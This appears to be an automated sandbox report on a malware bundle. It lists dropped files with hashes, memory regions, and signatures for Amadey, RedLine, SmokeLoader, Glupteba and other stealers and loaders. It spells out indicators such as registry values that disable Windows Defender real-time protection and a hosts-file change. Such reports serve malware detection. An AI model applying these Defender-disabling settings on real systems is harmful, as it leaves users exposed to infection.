SHA512 70f156441c8352637791b7f400749c6d942bedeb00e6db1b896920e60215c3b1d87cfaf55955bd35daac4e2989d663cbcf75e8f07622dbe60a3ed7063cdf1eb8

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 9db878eeac259021112e8734661d9975
SHA1 4068ea5998d4926cd8fab7d8ed3ba285fffc1733
SHA256 55cdb6bf052a8fbf3fefb6132225c25c8c15de0e11728770b0de8df4f1f6fd53
SHA512 cfdd8bae72690b25b79fd6b66bb0a8ca6cb8d481ab6cfb80d28897464ea8ef66012f8c2f9f83400b1ab871e2c1714c6c4bed445bf7cbd80cc7d950ae285f7900

memory/1784-351-0x000007FEF5E10000-0x000007FEF67FC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\C47D.exe

MD5 1f353056dfcf60d0c62d87b84f0a5e3f
SHA1 c71a24f90d3ca5a4e26ad8c58db1fc078a75a8f0
SHA256 f30654f4b2b72d4143616a3c2bb3b94b78a9726868b3dfa302ba36892e889d0e
SHA512 84b13853a888d1c7fb7ffbe0885fc7fe66237e46234ee0b95ba4fc31c14d94e8f7c7506d42fa70aab1b2c4aa744bd8043048c0e6ae75dd31da7c3089b0c0599d

C:\Users\Admin\AppData\Local\Temp\1C5E.exe

MD5 21b738f4b6e53e6d210996fa6ba6cc69
SHA1 3421aceeaa8f9f53169ae8af4f50f0d9d2c03f41
SHA256 3b1af64f9747985b3b79a7ce39c6625b43e562227dc2f96758118b2acb3e5e58
SHA512 f766a972fde598399091a82fc8db8d9edd25a9a5f9e5a0568769632091605eeb47bf3b44b69d37d51c1c7ab8be89cd4fb4846a5f06d719db885a35e049f1eb81

C:\Users\Admin\AppData\Local\Temp\C47D.exe

MD5 1f353056dfcf60d0c62d87b84f0a5e3f
SHA1 c71a24f90d3ca5a4e26ad8c58db1fc078a75a8f0
SHA256 f30654f4b2b72d4143616a3c2bb3b94b78a9726868b3dfa302ba36892e889d0e
SHA512 84b13853a888d1c7fb7ffbe0885fc7fe66237e46234ee0b95ba4fc31c14d94e8f7c7506d42fa70aab1b2c4aa744bd8043048c0e6ae75dd31da7c3089b0c0599d

memory/1488-376-0x0000000000230000-0x000000000028A000-memory.dmp

memory/1488-380-0x0000000000400000-0x000000000046F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\2B2E.exe

MD5 109da216e61cf349221bd2455d2170d4
SHA1 ea6983b8581b8bb57e47c8492783256313c19480
SHA256 a94bec1ee46f4a7e50fbccb77c8604c8c32b78a4879d18f923b5fa5e8e80d400
SHA512 460d710c0ffbe612ce5b07ae74abf360ebcf9e88993f2fc4448f31b96005f76f6902453c023477438b676f62de93e1c3e9ba980836c12dc5fc617728a9346e26

memory/2960-390-0x0000000000400000-0x0000000000431000-memory.dmp

memory/2960-389-0x0000000000020000-0x000000000003E000-memory.dmp

memory/824-408-0x00000000009E0000-0x00000000009FE000-memory.dmp

memory/824-410-0x0000000070D10000-0x00000000713FE000-memory.dmp

memory/2456-409-0x0000000000DA0000-0x0000000001CCA000-memory.dmp

memory/2960-423-0x0000000070D10000-0x00000000713FE000-memory.dmp

memory/2456-430-0x0000000070D10000-0x00000000713FE000-memory.dmp

memory/2960-433-0x0000000004540000-0x0000000004580000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 b44f3ea702caf5fba20474d4678e67f6
SHA1 d33da22fcd5674123807aaf01123d49a69901e33
SHA256 6b066c420ab228bf788f1abda2911eefbb89834640e64d8d6b4f14cb963e4eb8
SHA512 ed0dcd43d8bb8bab253daaf069353d1c720aa13217230d643e2c056089d56753aa4df5ee478833f716e248277c2553e81ae9c21f0f1502fdaf5bbac726d2a0c3

memory/824-486-0x0000000004830000-0x0000000004870000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 aa6f521d78f6e9101a1a99f8bfdfbf08
SHA1 81abd59d8275c1a1d35933f76282b411310323be
SHA256 3d5c0be6aafffa6324a44619131ff8994b0b59856dedf444ced072cae1ebc39d
SHA512 43ce4ad2d8295880ca1560c7a14cff89f2dfa70942d7679faae417f58177f63ae436604bbe914bd8fbbaedfb992ab6da4637af907e2b28696be53843d7ed8153

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\2SBOE92S\hLRJ1GG_y0J[1].ico

MD5 8cddca427dae9b925e73432f8733e05a
SHA1 1999a6f624a25cfd938eef6492d34fdc4f55dedc
SHA256 89676a3fb8639d6531c525e5800ff4cc44d06d27ff5607922d27e390eb5b6e62
SHA512 20fbee2886995c253e762f2bb814ad16890b0989deab4d92394363ef0060b96a634d87c380c7ba1b787a8ab312be968fed9329a729b4e0d64235a09e397db740

memory/2504-533-0x0000000070D10000-0x00000000713FE000-memory.dmp

memory/2504-535-0x00000000011C0000-0x00000000016D6000-memory.dmp

memory/2760-544-0x0000000002360000-0x0000000002460000-memory.dmp

memory/2760-545-0x0000000000220000-0x0000000000229000-memory.dmp

memory/2696-546-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/2696-548-0x0000000000400000-0x0000000000409000-memory.dmp

memory/2696-549-0x0000000000400000-0x0000000000409000-memory.dmp

memory/2588-550-0x0000000003FC0000-0x00000000043B8000-memory.dmp

memory/2588-567-0x0000000003FC0000-0x00000000043B8000-memory.dmp

memory/2456-572-0x0000000070D10000-0x00000000713FE000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XJKHGHKT\favicon[1].ico

MD5 f3418a443e7d841097c714d69ec4bcb8
SHA1 49263695f6b0cdd72f45cf1b775e660fdc36c606
SHA256 6da5620880159634213e197fafca1dde0272153be3e4590818533fab8d040770
SHA512 82d017c4b7ec8e0c46e8b75da0ca6a52fd8bce7fcf4e556cbdf16b49fc81be9953fe7e25a05f63ecd41c7272e8bb0a9fd9aedf0ac06cb6032330b096b3702563

memory/2504-569-0x0000000000950000-0x0000000000990000-memory.dmp

memory/2588-579-0x00000000043C0000-0x0000000004CAB000-memory.dmp

memory/824-588-0x0000000070D10000-0x00000000713FE000-memory.dmp

memory/2504-587-0x0000000000820000-0x0000000000821000-memory.dmp

memory/2960-589-0x0000000070D10000-0x00000000713FE000-memory.dmp

memory/2588-599-0x0000000000400000-0x000000000266D000-memory.dmp

memory/2960-624-0x0000000004540000-0x0000000004580000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3C428B1A3E5F57D887EC4B864FAC5DCC

MD5 1147109b272902a6646e5f965ce72b41
SHA1 486f7718ef62b04051b6008606162d5e344efdeb
SHA256 053fa271d64035d1191ec98388c8db4b635f88ebad6e7a33875485a012533c53
SHA512 2463dee09be4321a30b2cb13d30ad6ac3218158d161ee6fef01c4932014de6e9299a8f6c9f54ee1a163b9387c6b0cccd3cefce65c9f21b6401835ba910c8b40d

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 b5927f639cf51583b1c318a70dfc08f6
SHA1 65efb37cda1266029de8ef73efc05d95111d19ca
SHA256 a18a267982868d01326817731f4afab986f0bd1643f5ab5fa184c63c619e8117
SHA512 b7c39a5782262b1298c57fe0185acf2cf13755c57ce9b864daf92a387095e5fd85b9961ffd07823a62e5012e3951b833ffe384d1bf04578853521575116a010d

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3C428B1A3E5F57D887EC4B864FAC5DCC

MD5 e4a68ac854ac5242460afd72481b2a44
SHA1 df3c24f9bfd666761b268073fe06d1cc8d4f82a4
SHA256 cb3ccbb76031e5e0138f8dd39a23f9de47ffc35e43c1144cea27d46a5ab1cb5f
SHA512 5622207e1ba285f172756f6019af92ac808ed63286e24dfecc1e79873fb5d140f1ceb7133f2476e89a5f75f711f9813a9fbb8fd5287f64adfdcc53b864f9bdc5

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 41635ad2a4e921abe603b38c91b7c918
SHA1 875439a88843bf178420fef226fcf25b7b380be5
SHA256 d1eafffcccfe7213b68d639728c925c711d5b2619b35b66f1395c39d3d59ccc7
SHA512 62567c22016cea255d885f4a0ca24ce6266e991c256cca2f71c223b094befdbc94ad16eacec441038a3e0e294e1eec4eb1a18a35d6cbd8636051ecb35d40aade

memory/824-721-0x0000000004830000-0x0000000004870000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 966933936de945a65a5c3006623f19d7
SHA1 7632286fe76aa305827d7429b2636ef0d969e9d5
SHA256 d71314f2f5729622ec4bafd41ad9c0d8a84794f6403fdd6551bb61c29dc369b0
SHA512 1270b60755f9ea2da3c706598690495b8dc2bfbfc2487b09d8e60221d47f8c39dfee7e313fc2ef79d9736ecffbb6091f1353018ab9d840de9d3b389843ea3976

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 f88dd69779886c2b99bcb328da66fe6e
SHA1 52b69bd1213b7121b762259b93e8743629a487a7
SHA256 517f2501cb7043c3047fbc84080988b0a17262cebc31a7cd0c1686522a91db98
SHA512 56835cddc30e88a547d808b3ca7dbbee743a7ec70393a1fb904f131797e5bb74d64d16f97cdd047fc0ebbb1865971f2536080bee4b7cc58067fe84fee6759376

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 d364322105eeda35adb8f75d3dbe264b
SHA1 3e8d048121afe88a6d1e7c915e949d57dfbdb583
SHA256 f5f28886da947ebbc298ad9c8dd72f957a6f1c1708ac01c2d3cc6868a070d1b6
SHA512 c5a2a673f79aae1a42e810ff89af6161cdb7feb53207d113b7c465c3c7f9687d6ce1172fcc8af765a33b952cb94181a53cf817d5a5402bb5a87e5f0a1000f09f

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 aa5700ac60e872dd6aa47b0db6646f63
SHA1 97e14b95fd01fee6685643ab5372079ebcea3d60
SHA256 94cd025800010326b4119b97911eaebeb1612364b43f00677b878e844fa057e3
SHA512 fe61f6fff8e5538ceb6c60eca9907ae91b7cdad2934db02c2b802908647cf29447613ef686cd5950f4c343523ba64ee066bca0e26c399e7c2b2cfcff40279104

memory/2504-895-0x0000000070D10000-0x00000000713FE000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 ca7115786d46b0ced6592f8c4de4d9e1
SHA1 62a1bbaf7d84cc3374ca6f93918010db67f3df80
SHA256 e36f1bf2c70cb578d9531547ec13b3bad430500d1a1fa5170d86646a3b0a4688
SHA512 7a53ac506ff8e5b7e666187a6608fa0a5fb6c8c0077a98e1016cfe04f33902a5b883347885a3c971e881bf0995e934073ecd3b435ca159ca77fb7b1b74ab1a9e

memory/1272-915-0x0000000002DB0000-0x0000000002DC6000-memory.dmp

memory/2696-916-0x0000000000400000-0x0000000000409000-memory.dmp

memory/2588-914-0x0000000000400000-0x000000000266D000-memory.dmp

memory/2588-920-0x00000000043C0000-0x0000000004CAB000-memory.dmp

C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll

MD5 a5b509a3fb95cc3c8d89cd39fc2a30fb
SHA1 5aff4266a9c0f2af440f28aa865cebc5ddb9cd5c
SHA256 5f3c80056c7b1104c15d6fee49dac07e665c6ffd0795ad486803641ed619c529
SHA512 3cc58d989c461a04f29acbfe03ed05f970b3b3e97e6819962fc5c853f55bce7f7aba0544a712e3a45ee52ab31943c898f6b3684d755b590e3e961ae5ecd1edb9

memory/872-932-0x0000000004100000-0x00000000044F8000-memory.dmp

memory/2504-933-0x0000000000950000-0x0000000000990000-memory.dmp

memory/544-934-0x000000013F720000-0x000000013FCC1000-memory.dmp

memory/872-935-0x0000000004100000-0x00000000044F8000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 8a553ea0a71aad4e26a4e3207e94d8b7
SHA1 fae6b621ad32b268676060a893e89abda2f7515d
SHA256 1483bf1e839fc5f43f428a132f0eb7e1e6f9ff9db7635c5ee598cfa098c3b49f
SHA512 4cb9d0ba9e5f5eedfb57233188e4ea22971ae0b7ff26e31da14838da2334ecdf208db81b3a5eec729eb807339a891cd52edc7a309f5ad5a36b2b687d73ce7c9b

memory/872-942-0x0000000000400000-0x000000000266D000-memory.dmp

C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll

MD5 e913b0d252d36f7c9b71268df4f634fb
SHA1 5ac70d8793712bcd8ede477071146bbb42d3f018
SHA256 4cf5b584cf79ac523f645807a65bc153fbeaa564c0e1acb4dac9004fc9d038da
SHA512 3ea08f0897c1b7b5859961351eef59840bbf319a6ad7ebe1c9e1b5e2ce25588d7b1a37fd6c5417653521fc73f1f42eb043d0ee6fcd645aa92b8f305d726273b4

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 30cbf26e1570a5e72504f5996a25a2f7
SHA1 511d70519a5407bbca731fcfaac874332a3357a0
SHA256 97184bccfa71ee06bf443e05e5057941833db0475839983e3d637ce05e0b936c
SHA512 8eed3e9566962bcc92c5f62e1f13905bd39612e20c26205ec074658d0837f5cf888581fe45f36bcb4e4147aeb4bff35e3eb8975ec786db60ac8f846b23c7234f

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 0c9cc0c3b623465fe6df96c594dfc2fc
SHA1 590ec331345954a9f615acabff01a3203c74ecaa
SHA256 5f8621fcd7d672f0d6c3e9f973d3acd63a254ed998a588c69c557094503e8098
SHA512 c5d9a9e990627d3a29b2a06e0dc3d8f44fc47dfa41665a074ce5163608a4ac1a9b5b1aacb15ff8944cb2be6904952c1dae37402e86340c304b6396f8b9fb7d35

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 116d6e362b23fa53b60273be1ce7be98
SHA1 9e5b0943e656a7d762b38ec93e8bcbf7f3bbab3b
SHA256 75a5d58014c0b618bbb5412635082d7905f2eb4a0197d8630e0f1d78a2681e2f
SHA512 0f192f7d1fbaceb08e6769026a327ce558b37fb95e0a3e736c72c13e4eb4ec612702c0ef2b843d14a1efa4ecd6fd3957d6f979a99a8e80eac6e9d513bcaef2b8

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 36a83985f4823037bf7c0351f1125adb
SHA1 e4055a1ac18ce2c797d8c80e9999c1472ca77ddb
SHA256 1ea35dfa26ae54cf93e69d2e73c2223953a19eba20d0d762066c6bb0bacb95ae
SHA512 647369c320a6d4f538dd7c99b863a740e39abdef38bad0bbefed3a490b999604af776f8d6239d8b1137b5dafae2ea32a56bfda02f8433d4c1c864c80f1ba340d

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 602edf11b4dfd2beca64b3e4188eb62d
SHA1 bc5f66f0ed15d7b54951c469693c19eaedf28cc2
SHA256 36a2d111f8c18f1dd696728ded3758bc171e3a507327eb32cadda92813ff5227
SHA512 d7bcd3585f63e83a52b8166a80636caa3f7f856f2d60bdc7857835b1b0237a16abeb1c5651b831f1d387f84173e2f6ea5ba75b456ab54fcf301f3435a1418e4a

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 1f7bd24c57ef0ea25e0d9cc424e1ad98
SHA1 16a58b7ebcfde78e924e70ad9a26ee785309ed78
SHA256 27a9520a970622b4ba944a9971a1ebefbe0a7846dd92966a978746d2401a6797
SHA512 ffdef9c0330a81323c086ee457a90a7d1b56b56048b29247a5246a3d099c304a0225ea7200ae747506ed86aa710d8c07d5e2bd12fc44b4ef44a3d748afa11b57

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 642a437c8432a52be90726a5df29c2b8
SHA1 efe04409cb075ae66deba209496bd43cd9773449
SHA256 05fa76becb5954f44fec33d7b2e264d0fdd986f7f8b2f688f36a6ab0f2e1384f
SHA512 c660e040ab6906ea2416dfd2132a817fba9efe9571baf4e379bad6609dbd064ccd4a2be7f6de9bc376cae3ddecb7a0fc9bee078a68abb3b2ad8862c98f7ef904

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 5144d97325ea52ca33c212efed228039
SHA1 71743c7bee0e527fff91dbc0e5a263e2598539d4
SHA256 aee4a69c36e9718b4632a576c76d40471a51300ebd3b154962a23b5947cfb563
SHA512 91ae738c4660d450c9f57881184ec7d63f4f67609315da76e699a0717f784a770dfef406069eb171781d4965d22268459ff7ddc07f72f551929895434765a692

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 80e99eaef883aa1837c0ddf8b3817716
SHA1 caae3cb90b9d59e6eab82f7346b9c58443b8f377
SHA256 1563459cae2c649d39305b3095b91efb14e3a86c6137a4d2011fa0f71977edf3
SHA512 3e1a6ceb7121847cba829952f6fbf1a74b85037e4a1a23867ac133e364382019571ddae63616dbe63ef846b5122ef7987839c4423d29a5517b2aac847f86fb56

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 a60f94ba1cc53886ffe1a73159b76ee3
SHA1 7bacdad87a288b4540b3e339e9e2dc1d5984fdb3
SHA256 de47e08a85ff454c6f9307e4be96835354f58b29836c12414f40397b1a5b6e45
SHA512 39af84d7d9359eb3474c669c5dca8ddc72e514e5e92da86920a9fe721e436df62e74aa6868803aea5a5535d0d6f07c1c334f18dd37e2d4af0a4547b4d0ba98b5

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 4c15f5751ff185a96bed14a8a4d73043
SHA1 c560c2275cb37a093aad0245a6316d59938f4e35
SHA256 1e61f963a5c9266465bcb8fa09a96ae1c2726ecf602a4d60e25f33c619870ed7
SHA512 cd470633f28891fbfc2760cec378bd3706b1d8c3a588246fd971b18bf7a79881eebc67c5fc8cb63fc387652594efbd23f5a2613ef1155de2c02d651391149b3d

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 9401d3c2b3e6e50735b633cea308b30d
SHA1 e66e690ff88d6d522e3b1b3b08e77961639fd8dc
SHA256 32a28c2093ee7ac78109d0a2891c66e318031a482f8571e4e12a8dc6b59d1f02
SHA512 c9a9dd9317434c4b63934711db7d4afce60965a2ca0735c7353d43ca6da55cc910e28147dddb67342d8c6fc421de9c1519c40deb6dacc785807eb72b00e25c42

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 4ccd23476702243ac385f2e31537c96a
SHA1 3caa7ede31d2c4bd039b36d3f58976cae96f30ef
SHA256 1003cbf0a753850412750612a5c764643452d368d43bac69e3b7d288c3bc7d22
SHA512 864ae034d5ee4afc055603100c24dbe0d5a0067f30a0d77463218cb9aac35e7028443ec1a396917bdddb496702de2ab9dc10c2c0fe65333d6d7526363303e18d

memory/1784-1715-0x000007FEF5E10000-0x000007FEF67FC000-memory.dmp

memory/872-1782-0x0000000000400000-0x000000000266D000-memory.dmp

memory/2504-1783-0x00000000008A0000-0x00000000008BC000-memory.dmp

memory/2504-1787-0x00000000008A0000-0x00000000008B5000-memory.dmp

memory/2504-1795-0x00000000008A0000-0x00000000008B5000-memory.dmp

memory/2504-1799-0x00000000008A0000-0x00000000008B5000-memory.dmp

memory/2504-1803-0x00000000008A0000-0x00000000008B5000-memory.dmp

memory/2504-1801-0x00000000008A0000-0x00000000008B5000-memory.dmp

memory/2504-1807-0x00000000008A0000-0x00000000008B5000-memory.dmp

memory/2504-1805-0x00000000008A0000-0x00000000008B5000-memory.dmp

memory/2504-1797-0x00000000008A0000-0x00000000008B5000-memory.dmp

memory/2504-1793-0x00000000008A0000-0x00000000008B5000-memory.dmp

memory/2504-1791-0x00000000008A0000-0x00000000008B5000-memory.dmp

memory/2504-1789-0x00000000008A0000-0x00000000008B5000-memory.dmp

memory/2504-1784-0x00000000008A0000-0x00000000008B5000-memory.dmp

memory/2504-1785-0x00000000008A0000-0x00000000008B5000-memory.dmp

memory/2504-1809-0x00000000008D0000-0x00000000008D1000-memory.dmp

memory/2468-1816-0x0000000000400000-0x000000000047F000-memory.dmp

memory/2468-1815-0x0000000000400000-0x000000000047F000-memory.dmp

memory/2468-1817-0x0000000000400000-0x000000000047F000-memory.dmp

memory/2468-1818-0x0000000000400000-0x000000000047F000-memory.dmp

memory/2468-1819-0x0000000000400000-0x000000000047F000-memory.dmp

memory/2468-1820-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/2468-1822-0x0000000000400000-0x000000000047F000-memory.dmp

memory/1468-1825-0x000000001B2C0000-0x000000001B5A2000-memory.dmp

memory/2504-1826-0x0000000070D10000-0x00000000713FE000-memory.dmp

memory/1468-1827-0x00000000022A0000-0x00000000022A8000-memory.dmp

memory/1468-1834-0x000007FEF5C70000-0x000007FEF660D000-memory.dmp

memory/1468-1836-0x000007FEF5C70000-0x000007FEF660D000-memory.dmp

memory/1468-1837-0x00000000025C0000-0x0000000002640000-memory.dmp

memory/1468-1838-0x000007FEF5C70000-0x000007FEF660D000-memory.dmp

memory/1468-1840-0x00000000025CB000-0x0000000002632000-memory.dmp

memory/1468-1841-0x00000000025C4000-0x00000000025C7000-memory.dmp

memory/872-1842-0x0000000000400000-0x000000000266D000-memory.dmp

memory/2960-1845-0x0000000070D10000-0x00000000713FE000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tmpFDC2.tmp

MD5 02d2c46697e3714e49f46b680b9a6b83
SHA1 84f98b56d49f01e9b6b76a4e21accf64fd319140
SHA256 522cad95d3fa6ebb3274709b8d09bbb1ca37389d0a924cd29e934a75aa04c6c9
SHA512 60348a145bfc71b1e07cb35fa79ab5ff472a3d0a557741ea2d39b3772bc395b86e261bd616f65307ae0d997294e49b5548d32f11e86ef3e2704959ca63da8aac

C:\Users\Admin\AppData\Local\Temp\tmpFE83.tmp

MD5 ffb3fe1240662078b37c24fb150a0b08
SHA1 c3bd03fbef4292f607e4434cdf2003b4043a2771
SHA256 580dc431acaa3e464c04ffdc1182a0c8498ac28275acb5a823ede8665a3cb614
SHA512 6f881a017120920a1dff8080ca477254930964682fc8dc32ab18d7f6b0318d904770ecc3f78fafc6741ef1e19296f5b0e8f8f7ab66a2d8ed2eb22a5efacaeda5

memory/2468-1957-0x0000000000400000-0x000000000047F000-memory.dmp

memory/2084-1959-0x0000000004110000-0x0000000004508000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\R2FXS7CJRO3V95LTAJXZ.temp

MD5 abf50e556acc54c939af77100699b3b2
SHA1 883553c95f8281d2896d4ea07312d8b85f6c0dc0
SHA256 3744665131772cabec3ffc1e271d76f0d37017e5b16022fcfd63e20a5a022fd9
SHA512 01c297e8fbb40fd710c5e4fe097f29fc4afde1c972ada046bd306727fda4ab3ef7a5ba5c4fa7878bfa289d463d4e41b20d57be89e77679afcf709f72b61c9a4c

memory/1560-1964-0x000000001B150000-0x000000001B432000-memory.dmp

memory/1560-1965-0x0000000002320000-0x0000000002328000-memory.dmp

memory/1560-1967-0x0000000002450000-0x00000000024D0000-memory.dmp

memory/2084-1966-0x0000000000400000-0x000000000266D000-memory.dmp

memory/1560-1968-0x000007FEF5E60000-0x000007FEF67FD000-memory.dmp

memory/1560-1993-0x0000000002450000-0x00000000024D0000-memory.dmp

memory/1560-2002-0x0000000002450000-0x00000000024D0000-memory.dmp

memory/1560-2001-0x0000000002450000-0x00000000024D0000-memory.dmp

memory/1560-2000-0x000007FEF5E60000-0x000007FEF67FD000-memory.dmp

memory/1560-2003-0x000007FEF5E60000-0x000007FEF67FD000-memory.dmp

memory/824-2006-0x0000000070D10000-0x00000000713FE000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2023-10-10 23:11

Reported

2023-10-10 23:14

Platform

win10v2004-20230915-en

Max time kernel

152s

Max time network

191s

Command Line

C:\Windows\Explorer.EXE

Signatures

Amadey

trojan amadey

DcRat

rat infostealer dcrat
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\0f790705c38d456af7c8a0147e9c35e4.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Detect Mystic stealer payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Detects Healer an antivirus disabler dropper

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Healer

dropper healer

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\DE3A.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\DE3A.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\DE3A.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\DE3A.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\DE3A.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\DE3A.exe N/A

Mystic

stealer mystic

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\latestX.exe N/A

Stops running service(s)

evasion

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3027552071-446050021-1254071215-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\D86B.bat N/A
Key value queried \REGISTRY\USER\S-1-5-21-3027552071-446050021-1254071215-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\E0BB.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3027552071-446050021-1254071215-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3027552071-446050021-1254071215-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\1ECF.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v4499542.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9777033.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b2344812.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\c3763208.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\A9D7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\C33C.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\kx4St2pf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\IB0tc6CQ.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Ok8bG1wv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\FG2wS5ol.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1OG42Qe5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\D86B.bat N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DBE7.exe N/A
